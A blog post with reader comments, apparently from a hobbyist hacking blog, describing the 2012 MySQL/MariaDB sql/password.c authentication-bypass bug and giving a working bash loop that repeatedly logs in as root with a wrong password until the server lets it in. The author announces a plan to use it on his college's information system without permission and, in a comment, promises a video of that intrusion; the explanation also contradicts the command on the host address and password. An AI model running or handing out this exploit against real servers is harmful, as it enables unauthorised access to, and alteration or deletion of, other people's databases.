Exploiting MySQL/MariaDB sql/password.c Vulnerability to gain access into MySQL Server

mysql_hackHey guys, today I thought to talk about a vulnerability which is found on MySQL and MariaDB databases. I have surfed and went through a lot of written stuff to get a proper understanding about this vulnerability. Actually I was completely unaware of this stuff! I came knew about this when I  just scanned my college’s Online Information System (OIS) and I got an alert saying “MySQL/MariaDB sql/password.c is vulnerable”. When I researched over this topic, I have come up with a notion to hack into my college’s information systems. Well, I will let you guys know once I successfully perform that, but right now I’m on a vacation so I’ll give a try when I move back.

This vulnerability was found and reported on 9th of June’12. This was reported by Sergei Golubchik a Security Co-ordinator. You can take a complete look over the report by following the link. http://seclists.org/oss-sec/2012/q2/493.

The versions of MariaDB and MySQL, 5.1.61, 5.2.11, 5.3.5, 5.5.22 are found to be vulnerable.

According to Mr. Golubchik, the MySQL server give a root access to an attacker without a proper authentication. When an attacker connects to a MySQL server, he is asked for the username and password, where “root” is the username that exits by default. The password given as input is sent through the memcmp() function which compares the input string with the existing string. But it is observed that when the attacker tries to access the server remotely, giving nearly 300 attempts, the function’s non-zero value is misinterpreted due to the incorrect casting. Hence the attacker gains a complete access to the root user of MySQL server exploiting the MySQL/MariaDB sql/password.c bug.

How to exploit this bug?

So here comes the hacking part! Hope that your concept is clear, after reading the above explanation, now let’s move on to exploiting the bug. Follow the instructions below to perform the attack, that is to take the access over the MySQL server.

Open your bash or shell and type the following command:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Let us explore the command a little bit. Here we apply a for loop with a sequence of 1000 to run a command ” mysql -u root –password=bad -h 172.0.20.1″. Let’s have an even closer look, the -u parameter defines that root is the username and finally the password parameter is equated to the word hack.

After you run this command, wait for this server to display the following message:

Welcome to MySQL monitor. Command end with ; or \g.

Your MySQL connection id is 2313

Server version: 5.3.5-0ubuntu1 (Ubuntu)

Copyright (c) 2012, 2013

That’s it you have an access to the MySQL database of the server. Now you can execute the SQL commands to manipulate or delete the database content!

Have a wonderful time… Feel free to comment!

Advertisements

7 Comments

  1. I don’t know if that is possible, but have you thought of creating video tutorials or examples? Or at least, show us some examples of what to do after we are able to exploit the mysql bug :), i mean like – I’m in the system, wow! Now… I don’t know what to do :(. (I’m not asking about silly delete *.* like commands 🙂 )

    Reply

    1. Well, I think, I will be making a video while I hack into my college’s database and will come up with another article describing the whole process step-by-step with the demonstration. Then I will teach you the SQL commands that will be useful to communicate with the server and manipulate the data!

      Reply

Tell us what you think

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s